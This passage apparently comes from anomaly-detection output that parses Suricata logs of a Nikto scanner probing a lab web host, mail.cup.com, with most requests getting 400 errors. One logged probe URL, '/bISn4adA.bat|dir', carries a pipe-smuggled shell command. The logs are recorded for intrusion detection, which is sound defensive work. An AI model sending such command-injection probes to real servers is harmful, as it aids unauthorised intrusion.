"/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46868, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":911490828394343,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 911490828394343, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80", "/parser/model/time": 1583349514.257364, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46870, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.prf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.257763, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":648776268834898,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.prf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.prf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46870, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":648776268834898,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 648776268834898, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80", "/parser/model/time": 1583349514.259495, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46872, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.259845, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46872, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2191605830972159, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80", "/parser/model/time": 1583349514.2613, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46874, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.render_css", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.261544, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 